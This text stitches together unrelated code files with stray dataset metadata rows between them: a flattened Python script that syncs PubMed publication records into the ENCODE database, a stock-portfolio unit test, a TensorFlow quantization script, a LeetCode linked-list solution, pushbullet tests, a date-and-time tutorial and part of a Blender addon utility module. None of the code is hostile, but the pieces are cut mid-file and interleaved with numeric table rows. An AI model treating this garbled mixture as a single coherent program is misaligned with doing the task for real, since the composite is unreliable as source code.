record.get(self.MAPPING.get(key), "") self.entrezDict[record.get("PMID")] = tempDict def check_ENCODE(self, idList, connection, otherIdList=[], bothDicts={}): for pmid in idList: extraData = bothDicts.get(pmid) ENCODEvalue = encodedcc.get_ENCODE("/search/?type=publication&searchTerm=PMID:" + pmid, connection) if ENCODEvalue.get("@graph"): log = "PMID " + pmid + " is listed in ENCODE" logger.info('%s' % log) uuid = ENCODEvalue.get("@graph")[0].get("uuid") if not self.CREATE_ONLY: self.compare_entrez_ENCODE(uuid, pmid, connection, extraData) else: if self.CREATE_ONLY: self.get_entrez([pmid]) titleEntrez = self.entrezDict[pmid].get("title") found = False for otherID in otherIdList: 
titleENCODE = encodedcc.get_ENCODE("/search/?type=publication&searchTerm=" + otherID, connection) if titleENCODE.get("title") == titleEntrez: log = pmid + " is in ENCODE by a different name " + titleENCODE.get("uuid") logger.warning('%s' % log) self.compare_entrez_ENCODE(titleENCODE.get("uuid"), pmid, connection, extraData) if self.UPDATE: newIdent = titleENCODE.get("identifiers") newIdent.append("PMID:" + pmid) patch_dict = {"identifiers": newIdent} encodedcc.patch_ENCODE(titleENCODE.get("uuid"), connection, patch_dict) found = True if found is False: log = "This publication is not listed in ENCODE " + pmid logger.warning('%s' % log) if self.CREATE: self.POST_COUNT += 1 pmidData = self.entrezDict[pmid] log = "POSTing the new object: " + pmid logger.info('%s' % log) post_dict = { "title": pmidData.get("title"), "abstract": pmidData.get("abstract"), "submitted_by": "/users/8b1f8780-b5d6-4fb7-a5a2-ddcec9054288/", "lab": "/labs/encode-consortium/", "award": "/awards/ENCODE/", "categories": extraData.get("categories"), "published_by": extraData.get("published_by"), "date_published": pmidData.get("date_published"), "authors": pmidData.get("authors"), "identifiers": ["PMID:" + pmid], "journal": pmidData.get("journal"), "volume": pmidData.get("volume"), "issue": pmidData.get("issue"), "page": pmidData.get("page"), "status": "published" } if extraData.get("data_used"): post_dict["data_used"] = extraData.get("data_used") encodedcc.new_ENCODE(connection, "publications", post_dict) def compare_entrez_ENCODE(self, uuid, pmid, connection, extraData={}): '''compares value in ENCODE database to results from Entrez ''' encode = encodedcc.get_ENCODE(uuid, connection) entrez = self.entrezDict.get(pmid) patch = False if not entrez: log = "PMID " + pmid + " was not found in Entrez database!!" 
logger.warning('%s' % log) else: log = "PMID " + pmid logger.info('%s' % log) for key in entrez.keys(): if key in encode.keys(): if entrez[key] == encode[key]: log = "entrez key \"" + key + "\" matches encode key" logger.info('%s' % log) else: log = "\"" + key + "\" value in encode database does not match value in entrez database" logger.warning('%s' % log) log = "\tENTREZ: " + entrez[key] + "\n\tENCODE: " + encode[key] logger.warning('%s' % log) if self.UPDATE or self.UPDATE_ONLY: log = "PATCH in the new value for \"" + key + "\"" logger.info('%s' % log) patch_dict = {key: entrez[key]} encodedcc.patch_ENCODE(uuid, connection, patch_dict) patch = True else: log = "ENCODE missing \"" + key + "\" from Entrez. New key and value must be added" logger.warning('%s' % log) if self.UPDATE or self.UPDATE_ONLY: log = "PATCHing in new key \"" + key + "\"" logger.info('%s' % log) patch_dict = {key: entrez[key]} encodedcc.patch_ENCODE(uuid, connection, patch_dict) patch = True if not self.UPDATE_ONLY: for key in extraData.keys(): if type(extraData.get(key)) is list: if set(encode.get(key, [])) == set(extraData.get(key, [])): log = "encode \"" + key + "\" matches data in file" logger.info('%s' % log) else: log = "encode \"" + key + "\" value" + str(encode.get(key, [])) + "does not match file" logger.warning('%s' % log) if self.UPDATE: if any(extraData[key]): patch_dict = {key: extraData[key]} encodedcc.patch_ENCODE(uuid, connection, patch_dict) patch = True else: log = "No value in file to input for \"" + key + "\"" logger.warning('%s' % log) if type(extraData.get(key)) is str: if encode.get(key, "") == extraData.get(key, ""): log = "encode \"" + key + "\" matches data in file" logger.info('%s' % log) else: log = "encode \"" + key + "\" value" + str(encode.get(key, "")) + "does not match file" logger.warning('%s' % log) if self.UPDATE: patch_dict = {key: extraData[key]} encodedcc.patch_ENCODE(uuid, connection, patch_dict) patch = True if encode.get("status", "") != "published" 
and (self.UPDATE or self.UPDATE_ONLY): log = "Setting status to published" logger.info('%s' % log) encodedcc.patch_ENCODE(uuid, connection, {"status": "published"}) patch = True if patch is True: self.PATCH_COUNT += 1 def find_ENCODE_extras(self, communityList, consortiumList, connection): '''finds any publications in the ENCODE database that are not in the files provided ''' community_url = "/search/?type=publication&status=published\ &published_by=community&field=identifiers&limit=all" consortium_url = "/search/?type=publication&status=published\ &published_by!=community&field=identifiers&limit=all" communityResult = encodedcc.get_ENCODE(community_url, connection).get("@graph") consortiumResult = encodedcc.get_ENCODE(consortium_url, connection).get("@graph") communityPMIDfromENCODE = [] # list of PMID from ENCODE site communityOtherID = [] # list of non-PMID ids from ENCODE site for pub in communityResult: temp = pub.get("identifiers", []) for idNum in temp: if "PMID:" in idNum: communityPMIDfromENCODE.append(idNum) # this is something that has a pubmed ID elif "PMCID:PMC" in idNum: pass # this is an alternate PMID else: uuid = pub.get("@id") communityOtherID.append(uuid) # this is something that does not have a PMID yet, find it and PATCH it in community_ENCODE_Only = list(set(communityPMIDfromENCODE) - set(communityList)) consortiumPMIDfromENCODE = [] # list of PMID from ENCODE site consortiumOtherID = [] # list of non-PMID ids from ENCODE site for pub in consortiumResult: temp = pub.get("identifiers", []) for idNum in temp: if "PMID:" in idNum: consortiumPMIDfromENCODE.append(idNum) # this is something that has a pubmed ID elif "PMCID:PMC" in idNum: pass # this is an alternate PMID else: uuid = pub.get("@id") consortiumOtherID.append(uuid) # this is something that does not have a PMID yet, find it and PATCH it in consortium_ENCODE_Only = list(set(consortiumPMIDfromENCODE) - set(consortiumList)) return community_ENCODE_Only, communityOtherID, 
consortium_ENCODE_Only, consortiumOtherID def main(): args = getArgs() outfile = args.outfile CREATE_ONLY = args.createonly UPDATE_ONLY = args.updateonly Entrez.email = args.email key = encodedcc.ENC_Key(args.keyfile, args.key) connection = encodedcc.ENC_Connection(key) if args.debug: logger.setLevel(logging.DEBUG) else: logger.setLevel(logging.INFO) print("Running on ", connection.server) publication = PublicationUpdate(args) if not UPDATE_ONLY: publication.setup_publication() pmidList = publication.consortium_ids + publication.community_ids mergeDicts = publication.consortium_dict.copy() mergeDicts.update(publication.community_dict) # holds published_by, categories, and data_used if not CREATE_ONLY: publication.get_entrez(pmidList) community_ENCODE_Only, communityOtherID, consortium_ENCODE_Only, consortiumOtherID = publication.find_ENCODE_extras(publication.community_ids, publication.consortium_ids, connection) total_ENCODE_only = len(community_ENCODE_Only) + len(consortium_ENCODE_Only) allOtherIDs = communityOtherID + consortiumOtherID publication.check_ENCODE(pmidList, connection, allOtherIDs, mergeDicts) log = str(total_ENCODE_only) + " items in ENCODE but not in files" logger.info('%s' % log) log = str(publication.PATCH_COUNT) + " publication files PATCHed" logger.info('%s' % log) log = str(publication.POST_COUNT) + " publication files POSTed" logger.info('%s' % log) print("Results printed to", outfile) else: infile = UPDATE_ONLY with open(infile, 'r') as readfile: uuidList = [x.rstrip('\n') for x in readfile] # check each publication to see if it has a PMID, if it does add it to the PMIDlist # if it does not have one look it up on Entrez pmid_uuid_dict = {} for uuid in uuidList: pub = encodedcc.get_ENCODE(uuid, connection) title = pub.get("title", "") identifiers = pub.get("identifiers", []) found = False for i in identifiers: if "PMID:" in i: p = i.split(":")[1] found = True if found: pmid_uuid_dict[p] = uuid else: # search Entrez for publication by title 
handle = Entrez.esearch(db="pubmed", term=title) record = Entrez.read(handle) idlist = record["IdList"] if len(idlist) > 1: log = "More than one possible PMID found for " + uuid logger.error('%s' % log) log = str(idlist) + " are possible PMIDs" logger.error('%s' % log) elif len(idlist) == 0: log = "No possible PMID found for " + uuid logger.error('%s' % log) else: handle = Entrez.efetch(db="pubmed", id=idlist, rettype="medline", retmode="text") records = Medline.parse(handle) # save the records, you can convert them to a list records = list(records) for record in records: pm = record.get("PMID") ti = record.get("TI") log = "Publication " + uuid + " with title \"" + title + "\" matches PMID:" + pm + " with title \"" + ti + "\"" logger.info('%s' % log) identifiers.append("PMID:" + pm) encodedcc.patch_ENCODE(uuid, connection, {"identifiers": identifiers}) pmid_uuid_dict[pm] = uuid pmidList = list(pmid_uuid_dict.keys()) publication.get_entrez(pmidList) with open("pub_update.txt", "w") as f: for pmid in pmid_uuid_dict.keys(): publication.compare_entrez_ENCODE(pmid_uuid_dict[pmid], pmid, connection) f.write(str(len(pmid_uuid_dict.keys())) + " publications checked " + str(publication.PATCH_COUNT) + " publications PATCHed") if __name__ == '__main__': main()
48.85814
228
0.524775
2,113
21,009
5.128727
0.17416
0.009228
0.013196
0.016794
0.341884
0.310418
0.295562
0.272031
0.258743
0.245917
0
0.005132
0.369318
21,009
429
229
48.972028
0.812755
0.051549
0
0.302949
0
0
0.153105
0.011091
0
0
0
0
0
1
0.021448
false
0.005362
0.018767
0
0.048257
0.013405
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99c06645644d0ffeca98076ebecceb6c2c273402
2,044
py
Python
clusters/server/tests/day_test.py
ashsawh/stocks
3f8f0b10d606062ef3abb5160836eb23696f48b0
[ "Apache-2.0" ]
1
2019-07-29T20:23:39.000Z
2019-07-29T20:23:39.000Z
clusters/server/tests/day_test.py
ashsawh/stocks
3f8f0b10d606062ef3abb5160836eb23696f48b0
[ "Apache-2.0" ]
null
null
null
clusters/server/tests/day_test.py
ashsawh/stocks
3f8f0b10d606062ef3abb5160836eb23696f48b0
[ "Apache-2.0" ]
null
null
null
import unittest

from src.factory import DayFactory, TransactionsFactory
from src.value_objects import Stock, StockTransaction, CashTransaction
from src.day import Day


class DayTest(unittest.TestCase):
    """Unit tests for Day: catalog handling, transactions, closing values."""

    def setUp(self):
        # D0: a day "D0" holding AAPL/GOOG/SP500 positions plus 1000 cash.
        self.D0: Day = DayFactory().create("D0", ["AAPL 100", "GOOG 200", "SP500 175.75"], 1000)
        # T0: a mixed batch of stock/cash transactions ("SYMBOL ACTION QTY AMOUNT").
        self.T0 = TransactionsFactory().create([
            "AAPL SELL 100 30000",
            "GOOG BUY 10 10000",
            "CASH DEPOSIT 0 1000",
            "CASH FEE 0 50",
            "GOOG DIVIDEND 0 50",
            "TD BUY 100 10000"
        ])
        # Symbols expected in the day's catalog, in creation order.
        self.stock_list = ["AAPL", "GOOG", "SP500"]

    def test_set_catalog(self):
        # Catalog mirrors the symbols passed to the factory.
        self.assertEqual(self.stock_list, self.D0.catalog)

    def test_get_stocks(self):
        # Symbol -> quantity mapping for the day's holdings.
        self.assertEqual({"AAPL": 100, "GOOG": 200, "SP500": 175.75}, self.D0.get_stocks())

    def test_add(self):
        # A newly added stock is appended after the three from setUp.
        stock = Stock("MSFT", 100)
        self.D0.add(stock)
        self.assertEqual(self.D0.stocks[3], stock)

    def test_fill(self):
        # fill() appends the given stocks in order after existing ones.
        facebook = Stock("F", 100)
        uber = Stock("Uber", 100)
        stocks = [facebook, uber]
        length = len(self.D0.stocks)
        self.D0.fill(stocks)
        self.assertEqual(self.D0.stocks[length].symbol, facebook.symbol)

    def test_add_stock_transaction(self):
        # A SELL of 100 AAPL is recorded as a -100 amount for that symbol.
        self.D0.add_stock_transaction(self.T0[0])
        self.assertEqual(self.D0.transactions["AAPL"][0]['amount'], -100)

    def test_add_cash_transaction(self):
        # A deposit shows up as its raw amount in cash_transactions.
        transaction = CashTransaction("CASH", "0", 1000, "DEPOSIT")
        self.D0.add_cash_transaction(transaction)
        self.assertEqual(self.D0.cash_transactions[0], 1000)

    def test_add_transactions(self):
        # NOTE(review): this test only resets state and asserts nothing --
        # looks unfinished; confirm whether assertions were intended here.
        self.D0.transactions = []
        self.D0.cash_transactions = []

    def test_get_closing_stocks(self):
        # Closing quantities are reported as floats.
        self.assertEqual({'AAPL': 100.0, 'GOOG': 200.0, 'SP500': 175.75}, self.D0.get_closing_stocks())

    def test_get_closing_cash(self):
        self.assertEqual(self.D0.get_closing_cash(), 1000)


if __name__ == '__main__':
    unittest.main()
32.444444
103
0.631115
261
2,044
4.781609
0.252874
0.076923
0.091346
0.084135
0.14984
0.106571
0.038462
0
0
0
0
0.084659
0.231409
2,044
62
104
32.967742
0.709739
0
0
0
0
0
0.10274
0
0
0
0
0
0.170213
1
0.212766
false
0
0.085106
0
0.319149
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
1
99c08d33e58da9e15438ec52e98fb7ac7d97d9d5
2,832
py
Python
src/export_quantized.py
mbuckler/squeezeDet-low-precision
2c5c700d9e7c36cb611bb905e209f718dfbf177a
[ "BSD-2-Clause" ]
2
2019-08-07T21:18:03.000Z
2020-07-26T16:27:31.000Z
src/export_quantized.py
mbuckler/squeezeDet-low-precision
2c5c700d9e7c36cb611bb905e209f718dfbf177a
[ "BSD-2-Clause" ]
null
null
null
src/export_quantized.py
mbuckler/squeezeDet-low-precision
2c5c700d9e7c36cb611bb905e209f718dfbf177a
[ "BSD-2-Clause" ]
null
null
null
# Author: Mark Buckler """Quantization""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import cv2 from datetime import datetime import os.path import sys import time import numpy as np from six.moves import xrange import tensorflow as tf from config import * from dataset import pascal_voc, kitti from utils.util import bbox_transform, Timer from nets import * FLAGS = tf.app.flags.FLAGS tf.app.flags.DEFINE_string('checkpoint_path', '/tmp/bichen/logs/squeezeDet/train', """Path to the training checkpoint.""") tf.app.flags.DEFINE_string('net', 'squeezeDet', """Neural net architecture.""") from tensorflow.python import pywrap_tensorflow def quantize(): os.environ['CUDA_VISIBLE_DEVICES'] = '0' with tf.Graph().as_default() as g: assert FLAGS.net == 'vgg16' or FLAGS.net == 'resnet50' \ or FLAGS.net == 'squeezeDet' or FLAGS.net == 'squeezeDet+', \ 'Selected neural net architecture not supported: {}'.format(FLAGS.net) if FLAGS.net == 'vgg16': mc = kitti_vgg16_config() mc.BATCH_SIZE = 1 # TODO(bichen): allow batch size > 1 mc.LOAD_PRETRAINED_MODEL = False model = VGG16ConvDet(mc) elif FLAGS.net == 'resnet50': mc = kitti_res50_config() mc.BATCH_SIZE = 1 # TODO(bichen): allow batch size > 1 mc.LOAD_PRETRAINED_MODEL = False model = ResNet50ConvDet(mc) elif FLAGS.net == 'squeezeDet': mc = kitti_squeezeDet_config() mc.BATCH_SIZE = 1 # TODO(bichen): allow batch size > 1 mc.LOAD_PRETRAINED_MODEL = False model = SqueezeDet(mc) elif FLAGS.net == 'squeezeDet+': mc = kitti_squeezeDetPlus_config() mc.BATCH_SIZE = 1 # TODO(bichen): allow batch size > 1 mc.LOAD_PRETRAINED_MODEL = False model = SqueezeDetPlus(mc) # Start a session with tf.Session(config=tf.ConfigProto(allow_soft_placement=True)) as sess: # Load in the metagraph ckpt_path = FLAGS.checkpoint_path saver = tf.train.import_meta_graph(ckpt_path+'.meta',clear_devices=True) saver.restore(sess, ckpt_path) # Initialize the variables 
sess.run(tf.global_variables_initializer()) # Extract the variables into a list all_vars = tf.all_variables() for var in all_vars: if (('kernels' in var.name) and (not ('Momentum' in var.name))): print(var.name) print(sess.run(var)) add_1_op = tf.assign(var,var + 1) sess.run(add_1_op) print(sess.run(var)) exit() return def main(argv=None): # pylint: disable=unused-argument quantize() if __name__ == '__main__': tf.app.run()
29.810526
82
0.641243
363
2,832
4.812672
0.363636
0.041214
0.045793
0.038924
0.230109
0.204923
0.204923
0.169433
0.169433
0.169433
0
0.013731
0.254237
2,832
94
83
30.12766
0.813447
0.106992
0
0.151515
0
0
0.093213
0.013491
0
0
0
0.010638
0.015152
1
0.030303
false
0
0.257576
0
0.30303
0.060606
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
1
99c11294cdaedfbcacc68dc5da7e71c76a3c5c19
579
py
Python
medium/remove_nth_node_from_end_of_list.py
Jswig/leetcode
ca9ca182ab7824d642aa5ebbe5974669d2a6221c
[ "MIT" ]
null
null
null
medium/remove_nth_node_from_end_of_list.py
Jswig/leetcode
ca9ca182ab7824d642aa5ebbe5974669d2a6221c
[ "MIT" ]
null
null
null
medium/remove_nth_node_from_end_of_list.py
Jswig/leetcode
ca9ca182ab7824d642aa5ebbe5974669d2a6221c
[ "MIT" ]
null
null
null
# Anders Poirel


class ListNode:
    """Singly linked list node."""

    def __init__(self, x):
        self.val = x
        self.next = None


class Solution:
    def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:
        """Delete the n-th node from the end and return the list head.

        Single pass with two pointers kept n-1 nodes apart: when the lead
        pointer reaches the tail, the lag pointer sits on the node to remove.
        Assumes 1 <= n <= length of the list.
        """
        lead = head
        for _ in range(n - 1):            # put lead n-1 nodes ahead of lag
            lead = lead.next

        lag = head
        before = None                     # node immediately preceding lag
        while lead.next is not None:      # advance both until lead is the tail
            lead = lead.next
            before = lag
            lag = lag.next

        if before is None:                # lag never moved: remove the head
            return lag.next
        before.next = lag.next            # splice the target node out
        return head
21.444444
67
0.462867
64
579
4.125
0.46875
0.090909
0.090909
0
0
0
0
0
0
0
0
0.003205
0.46114
579
27
68
21.444444
0.842949
0.022453
0
0.105263
0
0
0
0
0
0
0
0
0
1
0.105263
false
0
0
0
0.263158
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99c2e61e389f9dd7c525b31829b0d447fc52f4de
1,674
py
Python
tests/community/test_pushbullet.py
soasme/runflow
b23086c2487a157b8c2d40f6225a1bcd9e8b6c60
[ "Apache-2.0" ]
6
2021-06-07T01:26:19.000Z
2021-07-02T12:57:07.000Z
tests/community/test_pushbullet.py
soasme/runflow
b23086c2487a157b8c2d40f6225a1bcd9e8b6c60
[ "Apache-2.0" ]
2
2021-06-06T02:56:37.000Z
2021-06-07T04:06:23.000Z
tests/community/test_pushbullet.py
soasme/runflow
b23086c2487a157b8c2d40f6225a1bcd9e8b6c60
[ "Apache-2.0" ]
null
null
null
import pytest

from runflow import runflow

# NOTE(review): this file tests the pushbullet task and mocks
# 'pushbullet.Pushbullet' below, yet skips on missing slack_sdk --
# looks copy/pasted from the slack tests; confirm whether 'pushbullet'
# was the intended module here.
pytest.importorskip('slack_sdk')


def test_pushbullet_push_note(mocker):
    # Running the push_note example flow forwards title/body to push_note.
    pb = mocker.MagicMock()
    mocker.patch('pushbullet.Pushbullet', pb)
    runflow(path="examples/pushbullet_push_note.hcl", vars={
        'pushbullet_api_key': 'any'
    })
    pb.return_value.push_note.assert_called_with(
        title='This is the title',
        body='This is the note',
        email='',
        channel=None,
    )


def test_pushbullet_push_link(mocker):
    # The push_link example supplies a URL; body defaults to empty.
    pb = mocker.MagicMock()
    mocker.patch('pushbullet.Pushbullet', pb)
    runflow(path="examples/pushbullet_push_link.hcl", vars={
        'pushbullet_api_key': 'any'
    })
    pb.return_value.push_link.assert_called_with(
        title='This is the title',
        url='https://runflow.org',
        body='',
        email='',
        channel=None,
    )


def test_pushbullet_push_file(mocker):
    # The push_file example forwards file metadata (type/name/url) untouched.
    pb = mocker.MagicMock()
    mocker.patch('pushbullet.Pushbullet', pb)
    runflow(path="examples/pushbullet_push_file.hcl", vars={
        'pushbullet_api_key': 'any',
    })
    pb.return_value.push_file.assert_called_with(
        title='This is the title',
        body='This is the body',
        file_type='image/jpeg',
        file_name='cat.jpg',
        file_url='https://i.imgur.com/IAYZ20i.jpg',
        email='',
        channel=None,
    )


def test_pushbullet_invalid_client(mocker, capsys):
    # A client block without api_key should produce an error on stderr.
    pb = mocker.MagicMock()
    mocker.patch('pushbullet.Pushbullet', pb)
    runflow(source="""
flow "invalid_client" {
  task "pushbullet_push" "this" {
    client = { }
  }
}
""")
    out, err = capsys.readouterr()
    assert 'set api_key' in err
23.914286
60
0.635006
202
1,674
5.049505
0.306931
0.096078
0.044118
0.090196
0.677451
0.677451
0.645098
0.572549
0.538235
0.482353
0
0.001552
0.229988
1,674
69
61
24.26087
0.78976
0
0
0.392857
0
0
0.30227
0.109319
0
0
0
0
0.071429
1
0.071429
false
0
0.053571
0
0.125
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99c393d65fd469c4d0c7d4d4470fc5c12bb10a44
3,269
py
Python
ch02/dateandtime.py
ibiscum/Learn-Python-Programming-Third-Edition
c8e0061e97b16c9b55250cc720a8bc7613cb6cca
[ "MIT" ]
null
null
null
ch02/dateandtime.py
ibiscum/Learn-Python-Programming-Third-Edition
c8e0061e97b16c9b55250cc720a8bc7613cb6cca
[ "MIT" ]
null
null
null
ch02/dateandtime.py
ibiscum/Learn-Python-Programming-Third-Edition
c8e0061e97b16c9b55250cc720a8bc7613cb6cca
[ "MIT" ]
null
null
null
"""Date and time""" # imports import arrow from datetime import date, datetime, timedelta, timezone import time import calendar as cal from zoneinfo import ZoneInfo # arrow small demo # date today = date.today() print(today) # datetime.date(2021, 3, 28) print(today.ctime()) print(today.isoformat()) print(today.weekday()) print(cal.day_name[today.weekday()]) print(today.day, today.month, today.year) print(today.timetuple()) # print(time.struct_time(tm_year=2021, tm_mon=3, tm_mday=28, tm_hour=0, tm_min=0, tm_sec=0, # tm_wday=6, tm_yday=87, tm_isdst=-1)) # time time.ctime() print(time.daylight) time.gmtime() # time.struct_time( # tm_year=2021, tm_mon=3, tm_mday=28, # tm_hour=14, tm_min=23, tm_sec=34, # tm_wday=6, tm_yday=87, tm_isdst=0 # ) time.gmtime(0) # time.struct_time( # tm_year=1970, tm_mon=1, tm_mday=1, # tm_hour=0, tm_min=0, tm_sec=0, # tm_wday=3, tm_yday=1, tm_isdst=0 # ) time.localtime() # time.struct_time( # tm_year=2021, tm_mon=3, tm_mday=28, # tm_hour=15, tm_min=23, tm_sec=50, # tm_wday=6, tm_yday=87, tm_isdst=1 # ) time.time() # datetime, timezones and timedelta now = datetime.now() utcnow = datetime.utcnow() print(now) # datetime.datetime(2021, 3, 28, 15, 25, 16, 258274) print(utcnow) # datetime.datetime(2021, 3, 28, 14, 25, 22, 918195) print(now.date()) # datetime.date(2021, 3, 28) print(now.day, now.month, now.year) var = now.date() == date.today() print(now.time()) # datetime.time(15, 25, 16, 258274) # now.hour, now.minute, now.second, now.microsecond now.ctime() # 'Sun Mar 28 15:25:16 2021' now.isoformat() # '2021-03-28T15:25:16.258274' now.timetuple() # time.struct_time( # tm_year=2021, tm_mon=3, tm_mday=28, # tm_hour=15, tm_min=25, tm_sec=16, # tm_wday=6, tm_yday=87, tm_isdst=-1 # ) print(now.tzinfo) print(utcnow.tzinfo) now.weekday() # 6 f_bday = datetime( 1975, 12, 29, 12, 50, tzinfo=ZoneInfo('Europe/Rome') ) h_bday = datetime( 1981, 10, 7, 15, 30, 50, tzinfo=timezone(timedelta(hours=2)) ) diff = h_bday - f_bday type(diff) # <class 
'datetime.timedelta'> print(diff.days) # 2109 diff.total_seconds() # 182223650.0 today + timedelta(days=49) # datetime.date(2021, 5, 16) now + timedelta(weeks=7) # datetime.datetime(2021, 5, 16, 15, 25, 16, 258274) # parsing (stdlib) datetime.fromisoformat('1977-11-24T19:30:13+01:00') # datetime.datetime( # 1977, 11, 24, 19, 30, 13, # tzinfo=datetime.timezone(datetime.timedelta(seconds=3600)) # ) datetime.fromtimestamp(time.time()) # datetime.datetime(2021, 3, 28, 15, 42, 2, 142696) datetime.now() # datetime.datetime(2021, 3, 28, 15, 42, 1, 120094) arrow.utcnow() # <Arrow [2021-03-28T14:43:20.017213+00:00]> arrow.now() # <Arrow [2021-03-28T15:43:39.370099+01:00]> local = arrow.now('Europe/Rome') print(local) # <Arrow [2021-03-28T16:59:14.093960+02:00]> local.to('utc') # <Arrow [2021-03-28T14:59:14.093960+00:00]> local.to('Europe/Moscow') # <Arrow [2021-03-28T17:59:14.093960+03:00]> local.to('Asia/Tokyo') # <Arrow [2021-03-28T23:59:14.093960+09:00]> print(local.datetime) # datetime.datetime( # 2021, 3, 28, 16, 59, 14, 93960, # tzinfo=tzfile('/usr/share/zoneinfo/Europe/Rome') # ) local.isoformat() # '2021-03-28T16:59:14.093960+02:00'
20.955128
91
0.67513
547
3,269
3.932358
0.243144
0.059507
0.02278
0.037192
0.280335
0.240818
0.218503
0.178987
0.145514
0.134821
0
0.17903
0.142245
3,269
155
92
21.090323
0.588088
0.559498
0
0
0
0
0.053052
0.018169
0
0
0
0
0
1
0
false
0
0.087719
0
0.087719
0.315789
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99c5edc4f3f5114316b3f4fae670cf161eac7a79
15,176
py
Python
utils.py
Soft8Soft/verge3d-blender-addon
20a7ca153285e4744a7079bc015584271a50a252
[ "Apache-2.0" ]
86
2018-08-14T17:08:27.000Z
2022-03-22T10:35:28.000Z
utils.py
Soft8Soft/verge3d-blender-addon
20a7ca153285e4744a7079bc015584271a50a252
[ "Apache-2.0" ]
3
2018-08-16T16:32:26.000Z
2021-01-31T11:09:01.000Z
utils.py
Soft8Soft/verge3d-blender-addon
20a7ca153285e4744a7079bc015584271a50a252
[ "Apache-2.0" ]
18
2018-08-15T10:32:19.000Z
2022-02-28T16:41:51.000Z
# Copyright (c) 2017-2019 Soft8Soft LLC
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.

import math

import bpy
import numpy as np
import mathutils

import pyosl.glslgen

# tolerance used when checking that matrix axes are mutually orthogonal
ORTHO_EPS = 1e-5

DEFAULT_MAT_NAME = 'v3d_default_material'

# module-level selection state used by setSelectedObject()/restoreSelectedObjects()
selectedObject = None
selectedObjectsSave = []
prevActiveObject = None


def clamp(val, minval, maxval):
    """Clamp val into the inclusive range [minval, maxval]."""
    return max(minval, min(maxval, val))


def integerToBlSuffix(val):
    """Format val as a zero-padded 3-character Blender-style suffix, e.g. 7 -> '007'."""
    suf = str(val)

    for i in range(0, 3 - len(suf)):
        suf = '0' + suf

    return suf


def getLightCyclesStrength(bl_light):
    return bl_light.energy


def getLightCyclesColor(bl_light):
    col = bl_light.color
    return [col[0], col[1], col[2]]


def setSelectedObject(bl_obj):
    """
    Select object for NLA baking
    """
    global prevActiveObject
    global selectedObject, selectedObjectsSave

    selectedObject = bl_obj
    selectedObjectsSave = bpy.context.selected_objects.copy()

    # NOTE: seems like we need both selection and setting active object
    for o in selectedObjectsSave:
        o.select_set(False)

    prevActiveObject = bpy.context.view_layer.objects.active
    bpy.context.view_layer.objects.active = bl_obj
    bl_obj.select_set(True)


def restoreSelectedObjects():
    """Undo setSelectedObject(): restore the previous selection and active object."""
    global prevActiveObject
    global selectedObject, selectedObjectsSave

    selectedObject.select_set(False)

    for o in selectedObjectsSave:
        o.select_set(True)

    bpy.context.view_layer.objects.active = prevActiveObject
    prevActiveObject = None

    selectedObject = None
    selectedObjectsSave = []


def getSceneByObject(obj):
    """Return the scene that contains obj, or None if no scene does."""
    for scene in bpy.data.scenes:
        index = scene.objects.find(obj.name)
        if index > -1 and scene.objects[index] == obj:
            return scene

    return None


def getTexImage(bl_tex):
    """
    Get texture image from a texture, avoiding AttributeError for textures
    without an image (e.g. a texture of type 'NONE').
    """
    return getattr(bl_tex, 'image', None)


def getTextureName(bl_texture):
    """Return the image name for image/environment texture nodes, the node name otherwise."""
    if (isinstance(bl_texture, (bpy.types.ShaderNodeTexImage,
            bpy.types.ShaderNodeTexEnvironment))):
        tex_name = bl_texture.image.name
    else:
        tex_name = bl_texture.name

    return tex_name


def mat4IsIdentity(mat4):
    return mat4 == mathutils.Matrix.Identity(4)


def mat4IsTRSDecomposable(mat4):
    # don't use mathutils.Matrix.is_orthogonal_axis_vectors property, because it
    # doesn't normalize vectors before checking
    mat = mat4.to_3x3().transposed()

    v0 = mat[0].normalized()
    v1 = mat[1].normalized()
    v2 = mat[2].normalized()

    return (abs(v0.dot(v1)) < ORTHO_EPS
            and abs(v0.dot(v2)) < ORTHO_EPS
            and abs(v1.dot(v2)) < ORTHO_EPS)


def mat4SvdDecomposeToMatrs(mat4):
    """
    Decompose the given matrix into a couple of TRS-decomposable matrices
    or Returns None in case of an error.
    """
    try:
        u, s, vh = np.linalg.svd(mat4.to_3x3())

        mat_u = mathutils.Matrix(u)
        mat_s = mathutils.Matrix([[s[0], 0, 0], [0, s[1], 0], [0, 0, s[2]]])
        mat_vh = mathutils.Matrix(vh)

        # NOTE: a potential reflection part in U and VH matrices isn't considered
        mat_trans = mathutils.Matrix.Translation(mat4.to_translation())
        mat_left = mat_trans @ (mat_u @ mat_s).to_4x4()

        return (mat_left, mat_vh.to_4x4())

    except np.linalg.LinAlgError:
        # numpy failed to decompose the matrix
        return None


def findArmature(obj):
    """Return the armature object deforming obj, preferring ARMATURE modifiers."""
    for mod in obj.modifiers:
        if mod.type == 'ARMATURE' and mod.object is not None:
            return mod.object

    # use obj.find_armature as a last resort, because it doesn't work with many
    # armature modifiers
    return obj.find_armature()


def matHasBlendBackside(bl_mat):
    return (matIsBlend(bl_mat)
            and (hasattr(bl_mat, 'show_transparent_back')
            and bl_mat.show_transparent_back))


